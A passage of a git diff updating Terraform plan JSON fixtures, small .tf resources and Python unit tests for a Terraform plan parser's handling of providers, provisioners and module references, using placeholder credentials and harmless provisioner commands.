+                                "description": "Controls if S3 bucket should have ELB log delivery policy attached"
+                            },
+                            "attach_inventory_destination_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have bucket inventory destination policy attached."
+                            },
+                            "attach_lb_log_delivery_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have ALB/NLB log delivery policy attached"
+                            },
+                            "attach_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have bucket policy attached (set to `true` to use value of `policy` as bucket policy)"
+                            },
+                            "attach_public_policy": {
+                                "default": true,
+                                "description": "Controls if a user defined public bucket policy will be attached (set to `false` to allow upstream to apply defaults to the bucket)"
+                            },
+                            "attach_require_latest_tls_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should require the latest version of TLS"
+                            },
+                            "block_public_acls": {
+                                "default": true,
+                                "description": "Whether Amazon S3 should block public ACLs for this bucket."
+                            },
+                            "block_public_policy": {
+                                "default": true,
+                                "description": "Whether Amazon S3 should block public bucket policies for this bucket."
+                            },
+                            "bucket": {
+                                "default": null,
+                                "description": "(Optional, Forces new resource) The name of the bucket. If omitted, Terraform will assign a random, unique name."
+                            },
+                            "bucket_prefix": {
+                                "default": null,
+                                "description": "(Optional, Forces new resource) Creates a unique bucket name beginning with the specified prefix. Conflicts with bucket."
+                            },
+                            "control_object_ownership": {
+                                "default": false,
+                                "description": "Whether to manage S3 Bucket Ownership Controls on this bucket."
+                            },
+                            "cors_rule": {
+                                "default": [],
+                                "description": "List of maps containing rules for Cross-Origin Resource Sharing."
+                            },
+                            "create_bucket": {
+                                "default": true,
+                                "description": "Controls if S3 bucket should be created"
+                            },
+                            "expected_bucket_owner": {
+                                "default": null,
+                                "description": "The account ID of the expected bucket owner"
+                            },
+                            "force_destroy": {
+                                "default": false,
+                                "description": "(Optional, Default:false ) A boolean that indicates all objects should be deleted from the bucket so that the bucket can be destroyed without error. These objects are not recoverable."
+                            },
+                            "grant": {
+                                "default": [],
+                                "description": "An ACL policy grant. Conflicts with `acl`"
+                            },
+                            "ignore_public_acls": {
+                                "default": true,
+                                "description": "Whether Amazon S3 should ignore public ACLs for this bucket."
+                            },
+                            "intelligent_tiering": {
+                                "default": {},
+                                "description": "Map containing intelligent tiering configuration."
+                            },
+                            "inventory_configuration": {
+                                "default": {},
+                                "description": "Map containing S3 inventory configuration."
+                            },
+                            "inventory_self_source_destination": {
+                                "default": false,
+                                "description": "Whether or not the inventory source bucket is also the destination bucket."
+                            },
+                            "inventory_source_account_id": {
+                                "default": null,
+                                "description": "The inventory source account id."
+                            },
+                            "inventory_source_bucket_arn": {
+                                "default": null,
+                                "description": "The inventory source bucket ARN."
+                            },
+                            "lifecycle_rule": {
+                                "default": [],
+                                "description": "List of maps containing configuration of object lifecycle management."
+                            },
+                            "logging": {
+                                "default": {},
+                                "description": "Map containing access bucket logging configuration."
+                            },
+                            "metric_configuration": {
+                                "default": [],
+                                "description": "Map containing bucket metric configuration."
+                            },
+                            "object_lock_configuration": {
+                                "default": {},
+                                "description": "Map containing S3 object locking configuration."
+                            },
+                            "object_lock_enabled": {
+                                "default": false,
+                                "description": "Whether S3 bucket should have an Object Lock configuration enabled."
+                            },
+                            "object_ownership": {
+                                "default": "BucketOwnerEnforced",
+                                "description": "Object ownership. Valid values: BucketOwnerEnforced, BucketOwnerPreferred or ObjectWriter. 'BucketOwnerEnforced': ACLs are disabled, and the bucket owner automatically owns and has full control over every object in the bucket. 'BucketOwnerPreferred': Objects uploaded to the bucket change ownership to the bucket owner if the objects are uploaded with the bucket-owner-full-control canned ACL. 'ObjectWriter': The uploading account will own the object if the object is uploaded with the bucket-owner-full-control canned ACL."
+                            },
+                            "owner": {
+                                "default": {},
+                                "description": "Bucket owner's display name and ID. Conflicts with `acl`"
+                            },
+                            "policy": {
+                                "default": null,
+                                "description": "(Optional) A valid bucket policy JSON document. Note that if the policy document is not specific enough (but still valid), Terraform may view the policy as constantly changing in a terraform plan. In this case, please make sure you use the verbose/specific version of the policy. For more information about building AWS IAM policy documents with Terraform, see the AWS IAM Policy Document Guide."
+                            },
+                            "replication_configuration": {
+                                "default": {},
+                                "description": "Map containing cross-region replication configuration."
+                            },
+                            "request_payer": {
+                                "default": null,
+                                "description": "(Optional) Specifies who should bear the cost of Amazon S3 data transfer. Can be either BucketOwner or Requester. By default, the owner of the S3 bucket would incur the costs of any data transfer. See Requester Pays Buckets developer guide for more information."
+                            },
+                            "restrict_public_buckets": {
+                                "default": true,
+                                "description": "Whether Amazon S3 should restrict public bucket policies for this bucket."
+                            },
+                            "server_side_encryption_configuration": {
+                                "default": {},
+                                "description": "Map containing server-side encryption configuration."
+                            },
+                            "tags": {
+                                "default": {},
+                                "description": "(Optional) A mapping of tags to assign to the bucket."
+                            },
+                            "versioning": {
+                                "default": {},
+                                "description": "Map containing versioning configuration."
+                            },
+                            "website": {
+                                "default": {},
+                                "description": "Map containing static web-site hosting or redirect configuration."
+                            }
+                        }
+                    },
+                    "version_constraint": "4.0.1"
+                }
+            }
+        }
+    }
+}
\ No newline at end of file
diff --git a/tests/terraform/parser/resources/plan_provisioners/tfplan.json b/tests/terraform/parser/resources/plan_provisioners/tfplan.json
index fe31076b164..f4b205440c3 100644
--- a/tests/terraform/parser/resources/plan_provisioners/tfplan.json
+++ b/tests/terraform/parser/resources/plan_provisioners/tfplan.json
@@ -5,82 +5,61 @@
     "root_module": {
       "resources": [
         {
-          "address": "aws_db_instance.default",
+          "address": "aws_instance.web",
           "mode": "managed",
-          "type": "aws_db_instance",
-          "name": "default",
+          "type": "aws_instance",
+          "name": "web",
           "provider_name": "registry.terraform.io/hashicorp/aws",
-          "schema_version": 2,
+          "schema_version": 1,
           "values": {
-            "allocated_storage": 10,
-            "allow_major_version_upgrade": null,
-            "apply_immediately": false,
-            "auto_minor_version_upgrade": true,
-            "blue_green_update": [],
-            "copy_tags_to_snapshot": false,
-            "custom_iam_instance_profile": null,
-            "customer_owned_ip_enabled": null,
-            "db_name": "mydb",
-            "delete_automated_backups": true,
-            "deletion_protection": null,
-            "domain": null,
-            "domain_iam_role_name": null,
-            "enabled_cloudwatch_logs_exports": null,
-            "engine": "mysql",
-            "engine_version": "5.7",
-            "final_snapshot_identifier": null,
-            "iam_database_authentication_enabled": null,
-            "instance_class": "db.t3.micro",
-            "manage_master_user_password": null,
-            "max_allocated_storage": null,
-            "monitoring_interval": 0,
-            "parameter_group_name": "default.mysql5.7",
-            "password": "foobarbaz",
-            "performance_insights_enabled": false,
-            "publicly_accessible": false,
-            "replicate_source_db": null,
-            "restore_to_point_in_time": [],
-            "s3_import": [],
-            "skip_final_snapshot": true,
-            "storage_encrypted": null,
-            "tags": null,
+            "ami": "ami-09a5b0b7edf08843d",
+            "credit_specification": [],
+            "get_password_data": false,
+            "hibernation": null,
+            "instance_type": "t3.micro",
+            "launch_template": [],
+            "source_dest_check": true,
+            "tags": {
+              "Name": "HelloWorld"
+            },
+            "tags_all": {
+              "Name": "HelloWorld"
+            },
             "timeouts": null,
-            "username": "foo"
+            "user_data_replace_on_change": false,
+            "volume_tags": null
           },
           "sensitive_values": {
-            "blue_green_update": [],
-            "listener_endpoint": [],
-            "master_user_secret": [],
-            "replicas": [],
-            "restore_to_point_in_time": [],
-            "s3_import": [],
+            "capacity_reservation_specification": [],
+            "cpu_options": [],
+            "credit_specification": [],
+            "ebs_block_device": [],
+            "enclave_options": [],
+            "ephemeral_block_device": [],
+            "instance_market_options": [],
+            "ipv6_addresses": [],
+            "launch_template": [],
+            "maintenance_options": [],
+            "metadata_options": [],
+            "network_interface": [],
+            "private_dns_name_options": [],
+            "root_block_device": [],
+            "secondary_private_ips": [],
+            "security_groups": [],
+            "tags": {},
             "tags_all": {},
             "vpc_security_group_ids": []
           }
-        },
-        {
-          "address": "terraform_data.bad2",
-          "mode": "managed",
-          "type": "terraform_data",
-          "name": "bad2",
-          "provider_name": "terraform.io/builtin/terraform",
-          "schema_version": 0,
-          "values": {
-            "input": null,
-            "output": null,
-            "triggers_replace": null
-          },
-          "sensitive_values": {}
         }
       ]
     }
   },
   "resource_changes": [
     {
-      "address": "aws_db_instance.default",
+      "address": "aws_instance.web",
       "mode": "managed",
-      "type": "aws_db_instance",
-      "name": "default",
+      "type": "aws_instance",
+      "name": "web",
       "provider_name": "registry.terraform.io/hashicorp/aws",
       "change": {
         "actions": [
@@ -88,123 +67,99 @@
         ],
         "before": null,
         "after": {
-          "allocated_storage": 10,
-          "allow_major_version_upgrade": null,
-          "apply_immediately": false,
-          "auto_minor_version_upgrade": true,
-          "blue_green_update": [],
-          "copy_tags_to_snapshot": false,
-          "custom_iam_instance_profile": null,
-          "customer_owned_ip_enabled": null,
-          "db_name": "mydb",
-          "delete_automated_backups": true,
-          "deletion_protection": null,
-          "domain": null,
-          "domain_iam_role_name": null,
-          "enabled_cloudwatch_logs_exports": null,
-          "engine": "mysql",
-          "engine_version": "5.7",
-          "final_snapshot_identifier": null,
-          "iam_database_authentication_enabled": null,
-          "instance_class": "db.t3.micro",
-          "manage_master_user_password": null,
-          "max_allocated_storage": null,
-          "monitoring_interval": 0,
-          "parameter_group_name": "default.mysql5.7",
-          "password": "foobarbaz",
-          "performance_insights_enabled": false,
-          "publicly_accessible": false,
-          "replicate_source_db": null,
-          "restore_to_point_in_time": [],
-          "s3_import": [],
-          "skip_final_snapshot": true,
-          "storage_encrypted": null,
-          "tags": null,
+          "ami": "ami-09a5b0b7edf08843d",
+          "credit_specification": [],
+          "get_password_data": false,
+          "hibernation": null,
+          "instance_type": "t3.micro",
+          "launch_template": [],
+          "source_dest_check": true,
+          "tags": {
+            "Name": "HelloWorld"
+          },
+          "tags_all": {
+            "Name": "HelloWorld"
+          },
           "timeouts": null,
-          "username": "foo"
+          "user_data_replace_on_change": false,
+          "volume_tags": null
         },
         "after_unknown": {
-          "address": true,
           "arn": true,
+          "associate_public_ip_address": true,
           "availability_zone": true,
-          "backup_retention_period": true,
-          "backup_target": true,
-          "backup_window": true,
-          "blue_green_update": [],
-          "ca_cert_identifier": true,
-          "character_set_name": true,
-          "db_subnet_group_name": true,
-          "endpoint": true,
-          "engine_version_actual": true,
-          "hosted_zone_id": true,
+          "capacity_reservation_specification": true,
+          "cpu_core_count": true,
+          "cpu_options": true,
+          "cpu_threads_per_core": true,
+          "credit_specification": [],
+          "disable_api_stop": true,
+          "disable_api_termination": true,
+          "ebs_block_device": true,
+          "ebs_optimized": true,
+          "enclave_options": true,
+          "ephemeral_block_device": true,
+          "host_id": true,
+          "host_resource_group_arn": true,
+          "iam_instance_profile": true,
           "id": true,
-          "identifier": true,
-          "identifier_prefix": true,
-          "iops": true,
-          "kms_key_id": true,
-          "latest_restorable_time": true,
-          "license_model": true,
-          "listener_endpoint": true,
-          "maintenance_window": true,
-          "master_user_secret": true,
-          "master_user_secret_kms_key_id": true,
-          "monitoring_role_arn": true,
-          "multi_az": true,
-          "nchar_character_set_name": true,
-          "network_type": true,
-          "option_group_name": true,
-          "performance_insights_kms_key_id": true,
-          "performance_insights_retention_period": true,
-          "port": true,
-          "replica_mode": true,
-          "replicas": true,
-          "resource_id": true,
-          "restore_to_point_in_time": [],
-          "s3_import": [],
-          "snapshot_identifier": true,
-          "status": true,
-          "storage_throughput": true,
-          "storage_type": true,
-          "tags_all": true,
-          "timezone": true,
+          "instance_initiated_shutdown_behavior": true,
+          "instance_lifecycle": true,
+          "instance_market_options": true,
+          "instance_state": true,
+          "ipv6_address_count": true,
+          "ipv6_addresses": true,
+          "key_name": true,
+          "launch_template": [],
+          "maintenance_options": true,
+          "metadata_options": true,
+          "monitoring": true,
+          "network_interface": true,
+          "outpost_arn": true,
+          "password_data": true,
+          "placement_group": true,
+          "placement_partition_number": true,
+          "primary_network_interface_id": true,
+          "private_dns": true,
+          "private_dns_name_options": true,
+          "private_ip": true,
+          "public_dns": true,
+          "public_ip": true,
+          "root_block_device": true,
+          "secondary_private_ips": true,
+          "security_groups": true,
+          "spot_instance_request_id": true,
+          "subnet_id": true,
+          "tags": {},
+          "tags_all": {},
+          "tenancy": true,
+          "user_data": true,
+          "user_data_base64": true,
           "vpc_security_group_ids": true
         },
         "before_sensitive": false,
         "after_sensitive": {
-          "blue_green_update": [],
-          "listener_endpoint": [],
-          "master_user_secret": [],
-          "password": true,
-          "replicas": [],
-          "restore_to_point_in_time": [],
-          "s3_import": [],
+          "capacity_reservation_specification": [],
+          "cpu_options": [],
+          "credit_specification": [],
+          "ebs_block_device": [],
+          "enclave_options": [],
+          "ephemeral_block_device": [],
+          "instance_market_options": [],
+          "ipv6_addresses": [],
+          "launch_template": [],
+          "maintenance_options": [],
+          "metadata_options": [],
+          "network_interface": [],
+          "private_dns_name_options": [],
+          "root_block_device": [],
+          "secondary_private_ips": [],
+          "security_groups": [],
+          "tags": {},
           "tags_all": {},
           "vpc_security_group_ids": []
         }
       }
-    },
-    {
-      "address": "terraform_data.bad2",
-      "mode": "managed",
-      "type": "terraform_data",
-      "name": "bad2",
-      "provider_name": "terraform.io/builtin/terraform",
-      "change": {
-        "actions": [
-          "create"
-        ],
-        "before": null,
-        "after": {
-          "input": null,
-          "output": null,
-          "triggers_replace": null
-        },
-        "after_unknown": {
-          "id": true
-        },
-        "before_sensitive": false,
-        "after_sensitive": {}
-      }
     }
   ],
   "configuration": {
@@ -212,13 +167,12 @@
       "aws": {
         "name": "aws",
         "full_name": "registry.terraform.io/hashicorp/aws",
-        "version_constraint": "~> 5.0",
         "expressions": {
           "access_key": {
             "constant_value": "mock_access_key"
           },
           "region": {
-            "constant_value": "us-east-1"
+            "constant_value": "us-west-1"
           },
           "secret_key": {
             "constant_value": "mock_secret_key"
@@ -233,65 +187,27 @@
             "constant_value": true
           }
         }
-      },
-      "terraform": {
-        "name": "terraform",
-        "full_name": "terraform.io/builtin/terraform"
       }
     },
     "root_module": {
       "resources": [
         {
-          "address": "aws_db_instance.default",
-          "mode": "managed",
-          "type": "aws_db_instance",
-          "name": "default",
-          "provider_config_key": "aws",
-          "expressions": {
-            "allocated_storage": {
-              "constant_value": 10
-            },
-            "db_name": {
-              "constant_value": "mydb"
-            },
-            "engine": {
-              "constant_value": "mysql"
-            },
-            "engine_version": {
-              "constant_value": "5.7"
-            },
-            "instance_class": {
-              "constant_value": "db.t3.micro"
-            },
-            "parameter_group_name": {
-              "constant_value": "default.mysql5.7"
-            },
-            "password": {
-              "constant_value": "foobarbaz"
-            },
-            "skip_final_snapshot": {
-              "constant_value": true
-            },
-            "username": {
-              "constant_value": "foo"
-            }
-          },
-          "schema_version": 2
-        },
-        {
-          "address": "aws_instance.bad",
+          "address": "aws_instance.web",
           "mode": "managed",
           "type": "aws_instance",
-          "name": "bad",
+          "name": "web",
           "provider_config_key": "aws",
           "provisioners": [
             {
               "type": "local-exec",
               "expressions": {
                 "command": {
-                  "references": [
-                    "self.private_ip",
-                    "self"
+                  "constant_value": "open WFH, '>completed.txt' and print WFH scalar localtime"
+                },
+                "interpreter": {
+                  "constant_value": [
+                    "perl",
+                    "-e"
                   ]
                 }
               }
@@ -299,29 +215,7 @@
           ],
           "expressions": {
             "ami": {
-              "references": [
-                "data.aws_ami.ubuntu.id",
-                "data.aws_ami.ubuntu"
-              ]
-            },
-            "instance_type": {
-              "constant_value": "t3.micro"
-            }
-          },
-          "schema_version": 1
-        },
-        {
-          "address": "aws_instance.web",
-          "mode": "managed",
-          "type": "aws_instance",
-          "name": "web",
-          "provider_config_key": "aws",
-          "expressions": {
-            "ami": {
-              "references": [
-                "data.aws_ami.ubuntu.id",
-                "data.aws_ami.ubuntu"
-              ]
+              "constant_value": "ami-09a5b0b7edf08843d"
             },
             "instance_type": {
               "constant_value": "t3.micro"
@@ -333,73 +227,9 @@
             }
           },
           "schema_version": 1
-        },
-        {
-          "address": "terraform_data.bad2",
-          "mode": "managed",
-          "type": "terraform_data",
-          "name": "bad2",
-          "provider_config_key": "terraform",
-          "provisioners": [
-            {
-              "type": "local-exec",
-              "expressions": {
-                "command": {
-                  "constant_value": "open WFH, '>completed.txt' and print WFH scalar localtime"
-                },
-                "interpreter": {
-                  "constant_value": [
-                    "perl",
-                    "-e"
-                  ]
-                }
-              }
-            }
-          ],
-          "schema_version": 0
-        },
-        {
-          "address": "data.aws_ami.ubuntu",
-          "mode": "data",
-          "type": "aws_ami",
-          "name": "ubuntu",
-          "provider_config_key": "aws",
-          "expressions": {
-            "filter": [
-              {
-                "name": {
-                  "constant_value": "name"
-                },
-                "values": {
-                  "constant_value": [
-                    "ubuntu/images/hvm-ssd/ubuntu-focal-20.04-amd64-server-*"
-                  ]
-                }
-              },
-              {
-                "name": {
-                  "constant_value": "virtualization-type"
-                },
-                "values": {
-                  "constant_value": [
-                    "hvm"
-                  ]
-                }
-              }
-            ],
-            "most_recent": {
-              "constant_value": true
-            },
-            "owners": {
-              "constant_value": [
-                "099720109477"
-              ]
-            }
-          },
-          "schema_version": 0
         }
       ]
     }
   },
-  "timestamp": "2023-09-30T04:54:35Z"
+  "timestamp": "2024-07-26T05:47:45Z"
 }
diff --git a/tests/terraform/parser/resources/plan_provisioners/tfplan2.json b/tests/terraform/parser/resources/plan_provisioners/tfplan2.json
new file mode 100644
index 00000000000..18696d38e50
--- /dev/null
+++ b/tests/terraform/parser/resources/plan_provisioners/tfplan2.json
@@ -0,0 +1,243 @@
+{
+  "format_version": "1.2",
+  "terraform_version": "1.5.7",
+  "planned_values": {
+    "root_module": {
+      "resources": [
+        {
+          "address": "aws_instance.web",
+          "mode": "managed",
+          "type": "aws_instance",
+          "name": "web",
+          "provider_name": "registry.terraform.io/hashicorp/aws",
+          "schema_version": 1,
+          "values": {
+            "ami": "ami-09a5b0b7edf08843d",
+            "credit_specification": [],
+            "get_password_data": false,
+            "hibernation": null,
+            "instance_type": "t3.micro",
+            "launch_template": [],
+            "source_dest_check": true,
+            "tags": {
+              "Name": "HelloWorld"
+            },
+            "tags_all": {
+              "Name": "HelloWorld"
+            },
+            "timeouts": null,
+            "user_data_replace_on_change": false,
+            "volume_tags": null
+          },
+          "sensitive_values": {
+            "capacity_reservation_specification": [],
+            "cpu_options": [],
+            "credit_specification": [],
+            "ebs_block_device": [],
+            "enclave_options": [],
+            "ephemeral_block_device": [],
+            "instance_market_options": [],
+            "ipv6_addresses": [],
+            "launch_template": [],
+            "maintenance_options": [],
+            "metadata_options": [],
+            "network_interface": [],
+            "private_dns_name_options": [],
+            "root_block_device": [],
+            "secondary_private_ips": [],
+            "security_groups": [],
+            "tags": {},
+            "tags_all": {},
+            "vpc_security_group_ids": []
+          }
+        }
+      ]
+    }
+  },
+  "resource_changes": [
+    {
+      "address": "aws_instance.web",
+      "mode": "managed",
+      "type": "aws_instance",
+      "name": "web",
+      "provider_name": "registry.terraform.io/hashicorp/aws",
+      "change": {
+        "actions": [
+          "create"
+        ],
+        "before": null,
+        "after": {
+          "ami": "ami-09a5b0b7edf08843d",
+          "credit_specification": [],
+          "get_password_data": false,
+          "hibernation": null,
+          "instance_type": "t3.micro",
+          "launch_template": [],
+          "source_dest_check": true,
+          "tags": {
+            "Name": "HelloWorld"
+          },
+          "tags_all": {
+            "Name": "HelloWorld"
+          },
+          "timeouts": null,
+          "user_data_replace_on_change": false,
+          "volume_tags": null
+        },
+        "after_unknown": {
+          "arn": true,
+          "associate_public_ip_address": true,
+          "availability_zone": true,
+          "capacity_reservation_specification": true,
+          "cpu_core_count": true,
+          "cpu_options": true,
+          "cpu_threads_per_core": true,
+          "credit_specification": [],
+          "disable_api_stop": true,
+          "disable_api_termination": true,
+          "ebs_block_device": true,
+          "ebs_optimized": true,
+          "enclave_options": true,
+          "ephemeral_block_device": true,
+          "host_id": true,
+          "host_resource_group_arn": true,
+          "iam_instance_profile": true,
+          "id": true,
+          "instance_initiated_shutdown_behavior": true,
+          "instance_lifecycle": true,
+          "instance_market_options": true,
+          "instance_state": true,
+          "ipv6_address_count": true,
+          "ipv6_addresses": true,
+          "key_name": true,
+          "launch_template": [],
+          "maintenance_options": true,
+          "metadata_options": true,
+          "monitoring": true,
+          "network_interface": true,
+          "outpost_arn": true,
+          "password_data": true,
+          "placement_group": true,
+          "placement_partition_number": true,
+          "primary_network_interface_id": true,
+          "private_dns": true,
+          "private_dns_name_options": true,
+          "private_ip": true,
+          "public_dns": true,
+          "public_ip": true,
+          "root_block_device": true,
+          "secondary_private_ips": true,
+          "security_groups": true,
+          "spot_instance_request_id": true,
+          "subnet_id": true,
+          "tags": {},
+          "tags_all": {},
+          "tenancy": true,
+          "user_data": true,
+          "user_data_base64": true,
+          "vpc_security_group_ids": true
+        },
+        "before_sensitive": false,
+        "after_sensitive": {
+          "capacity_reservation_specification": [],
+          "cpu_options": [],
+          "credit_specification": [],
+          "ebs_block_device": [],
+          "enclave_options": [],
+          "ephemeral_block_device": [],
+          "instance_market_options": [],
+          "ipv6_addresses": [],
+          "launch_template": [],
+          "maintenance_options": [],
+          "metadata_options": [],
+          "network_interface": [],
+          "private_dns_name_options": [],
+          "root_block_device": [],
+          "secondary_private_ips": [],
+          "security_groups": [],
+          "tags": {},
+          "tags_all": {},
+          "vpc_security_group_ids": []
+        }
+      }
+    }
+  ],
+  "configuration": {
+    "provider_config": {
+      "aws": {
+        "name": "aws",
+        "full_name": "registry.terraform.io/hashicorp/aws",
+        "expressions": {
+          "access_key": {
+            "constant_value": "mock_access_key"
+          },
+          "region": {
+            "constant_value": "us-west-1"
+          },
+          "secret_key": {
+            "constant_value": "mock_secret_key"
+          },
+          "skip_credentials_validation": {
+            "constant_value": true
+          },
+          "skip_metadata_api_check": {
+            "constant_value": true
+          },
+          "skip_requesting_account_id": {
+            "constant_value": true
+          }
+        }
+      }
+    },
+    "root_module": {
+      "resources": [
+        {
+          "address": "aws_instance.web",
+          "mode": "managed",
+          "type": "aws_instance",
+          "name": "web",
+          "provider_config_key": "aws",
+          "provisioners": [
+            {
+              "type": "file",
+              "expressions": {
+                "destination": {
+                  "constant_value": "/tmp/script.sh"
+                },
+                "source": {
+                  "constant_value": "script.sh"
+                }
+              }
+            },
+            {
+              "type": "remote-exec",
+              "expressions": {
+                "inline": {
+                  "constant_value": [
+                    "chmod +x /tmp/script.sh",
+                    "/tmp/script.sh args"
+                  ]
+                }
+              }
+            }
+          ],
+          "expressions": {
+            "ami": {
+              "constant_value": "ami-09a5b0b7edf08843d"
+            },
+            "instance_type": {
+              "constant_value": "t3.micro"
+            },
+            "tags": {
+              "constant_value": {
+                "Name": "HelloWorld"
+              }
+            }
+          },
+          "schema_version": 1
+        }
+      ]
+    }
+  },
+  "timestamp": "2024-07-26T05:10:57Z"
+}
diff --git a/tests/terraform/parser/test_plan_parser.py b/tests/terraform/parser/test_plan_parser.py
index f0e355aabf4..bead3b186b3 100644
--- a/tests/terraform/parser/test_plan_parser.py
+++ b/tests/terraform/parser/test_plan_parser.py
@@ -21,6 +21,14 @@ def test_tags_values_are_flattened(self):
             if tag_key not in ['__startline__', '__endline__', 'start_line', 'end_line']:
                 self.assertIsInstance(tag_value, StrNode)
 
+    def test_provider_is_included(self):
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+        valid_plan_path = current_dir + "/resources/plan_tags/tfplan.json"
+        tf_definition, _ = parse_tf_plan(valid_plan_path, {})
+        file_provider_definition = tf_definition['provider']
+        self.assertTrue(file_provider_definition) # assert a provider exists
+        assert file_provider_definition[0].get('aws',{}).get('region', None) == 'us-west-2'
+
     def test_more_tags_values_are_flattened(self):
         current_dir = os.path.dirname(os.path.realpath(__file__))
         valid_plan_path = current_dir + "/resources/plan_tags_variety/tfplan.json"
@@ -53,13 +61,24 @@ def test_encodings(self):
 
     def test_provisioners(self):
         current_dir = os.path.dirname(os.path.realpath(__file__))
-        valid_plan_path = current_dir + "/resources/plan_provisioners/tfplan.json"
+        plan_files = ['tfplan.json','tfplan2.json']
+
+        for file in plan_files:
+            valid_plan_path = current_dir + "/resources/plan_provisioners/" + file
+            tf_definition, _ = parse_tf_plan(valid_plan_path, {})
+            file_resource_definition = tf_definition['resource'][0]
+            resource_definition = next(iter(file_resource_definition.values()))
+            resource_attributes = next(iter(resource_definition.values()))
+            self.assertTrue(resource_attributes['provisioner'])
+
+    def test_module_with_connected_resources(self):
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+        valid_plan_path = current_dir + "/resources/plan_module_with_connected_resources/tfplan.json"
         tf_definition, _ = parse_tf_plan(valid_plan_path, {})
         file_resource_definition = tf_definition['resource'][1]
         resource_definition = next(iter(file_resource_definition.values()))
         resource_attributes = next(iter(resource_definition.values()))
-        self.assertTrue(resource_attributes['provisioner'])
-
+        self.assertTrue(resource_attributes['references_'])
 
 def test_large_file(mocker: MockerFixture):
     # given
diff --git a/tests/terraform/runner/resources/for_each/main.tf b/tests/terraform/runner/resources/for_each/main.tf
new file mode 100644
index 00000000000..5c0012bd272
--- /dev/null
+++ b/tests/terraform/runner/resources/for_each/main.tf
@@ -0,0 +1,5 @@
+
+module "simple" {
+  source   = "./simple"
+  count = 2
+}
\ No newline at end of file
diff --git a/tests/terraform/runner/resources/for_each/simple/main.tf b/tests/terraform/runner/resources/for_each/simple/main.tf
new file mode 100644
index 00000000000..96e26cd7f73
--- /dev/null
+++ b/tests/terraform/runner/resources/for_each/simple/main.tf
@@ -0,0 +1,5 @@
+resource "aws_s3_bucket_object" "this_file" {
+  bucket   = "your_bucket_name"
+  key      = "readme.md"
+  source   = "readme.md"
+}
diff --git a/tests/terraform/runner/resources/list_of_routes/list_of_routes.tf b/tests/terraform/runner/resources/list_of_routes/list_of_routes.tf
new file mode 100644
index 00000000000..bec66467c16
--- /dev/null
+++ b/tests/terraform/runner/resources/list_of_routes/list_of_routes.tf
@@ -0,0 +1,14 @@
+resource "aws_route_table" "private_route_table" {
+  vpc_id = aws_vpc.vpc.id
+
+  route {
+    cidr_block                            = "10.0.0.0/32"
+    vpc_peering_connection_id = var.vpc_peering_connection_id1
+  }
+
+  route {
+    cidr_block                            = "0.0.0.0/0"
+    vpc_peering_connection_id = var.vpc_peering_connection_id2
+  }
+
+}
\ No newline at end of file
diff --git a/tests/terraform/runner/resources/plan/tf_plan_filtered_rule_fail.json b/tests/terraform/runner/resources/plan/tf_plan_filtered_rule_fail.json
new file mode 100644
index 00000000000..f0551c12b36
--- /dev/null
+++ b/tests/terraform/runner/resources/plan/tf_plan_filtered_rule_fail.json
@@ -0,0 +1,183 @@
+{
+    "format_version": "1.2",
+    "terraform_version": "1.5.7",
+    "planned_values": {
+        "root_module": {
+            "resources": [
+                {
+                    "address": "aws_s3_bucket_lifecycle_configuration.this",
+                    "mode": "managed",
+                    "type": "aws_s3_bucket_lifecycle_configuration",
+                    "name": "this",
+                    "provider_name": "registry.terraform.io/hashicorp/aws",
+                    "schema_version": 0,
+                    "values": {
+                        "bucket": "my_bucket",
+                        "expected_bucket_owner": "",
+                        "id": "the_id",
+                        "rule": [
+                            {
+                                "abort_incomplete_multipart_upload": [
+                                    {
+                                        "days_after_initiation": 7
+                                    }
+                                ],
+                                "expiration": [],
+                                "filter": [
+                                    {
+                                        "and": [],
+                                        "object_size_greater_than": "",
+                                        "object_size_less_than": "",
+                                        "prefix": "",
+                                        "tag": ["my_tag"]
+                                    }
+                                ],
+                                "id": "failed-uploads",
+                                "noncurrent_version_expiration": [],
+                                "noncurrent_version_transition": [],
+                                "prefix": "",
+                                "status": "Enabled",
+                                "transition": []
+                            }
+                        ],
+                        "timeouts": null
+                    },
+                    "sensitive_values": {
+                        "rule": [
+                            {
+                                "abort_incomplete_multipart_upload": [
+                                    {}
+                                ],
+                                "expiration": [],
+                                "filter": [
+                                    {
+                                        "and": [],
+                                        "tag": []
+                                    }
+                                ],
+                                "noncurrent_version_expiration": [],
+                                "noncurrent_version_transition": [],
+                                "transition": []
+                            }
+                        ]
+                    }
+                }
+            ]
+        }
+    },
+    "resource_changes": [
+        {
+            "address": "aws_s3_bucket_lifecycle_configuration.this",
+            "mode": "managed",
+            "type": "aws_s3_bucket_lifecycle_configuration",
+            "name": "this",
+            "provider_name": "registry.terraform.io/hashicorp/aws",
+            "change": {
+                "actions": [
+                    "update"
+                ],
+                "before": {
+                    "bucket": "my_bucket",
+                    "expected_bucket_owner": "",
+                    "id": "the_id",
+                    "rule": [
+                        {
+                            "abort_incomplete_multipart_upload": [
+                                {
+                                    "days_after_initiation": 6
+                                }
+                            ],
+                            "expiration": [],
+                            "filter": [
+                                {
+                                    "and": [],
+                                    "object_size_greater_than": "",
+                                    "object_size_less_than": "",
+                                    "prefix": "",
+                                    "tag": []
+                                }
+                            ],
+                            "id": "failed-uploads",
+                            "noncurrent_version_expiration": [],
+                            "noncurrent_version_transition": [],
+                            "prefix": "",
+                            "status": "Enabled",
+                            "transition": []
+                        }
+                    ],
+                    "timeouts": null
+                },
+                "after": {
+                    "bucket": "my_bucket",
+                    "expected_bucket_owner": "",
+                    "id": "the_id",
+                    "rule": [
+                        {
+                            "abort_incomplete_multipart_upload": [
+                                {
+                                    "days_after_initiation": 7
+                                }
+                            ],
+                            "expiration": [],
+                            "filter": [
+                                {
+                                    "and": [],
+                                    "object_size_greater_than": "",
+                                    "object_size_less_than": "",
+                                    "prefix": "",
+                                    "tag": []
+                                }
+                            ],
+                            "id": "failed-uploads",
+                            "noncurrent_version_expiration": [],
+                            "noncurrent_version_transition": [],
+                            "prefix": "",
+                            "status": "Enabled",
+                            "transition": []
+                        }
+                    ],
+                    "timeouts": null
+                },
+                "after_unknown": {},
+                "before_sensitive": {
+                    "rule": [
+                        {
+                            "abort_incomplete_multipart_upload": [
+                                {}
+                            ],
+                            "expiration": [],
+                            "filter": [
+                                {
+                                    "and": [],
+                                    "tag": []
+                                }
+                            ],
+                            "noncurrent_version_expiration": [],
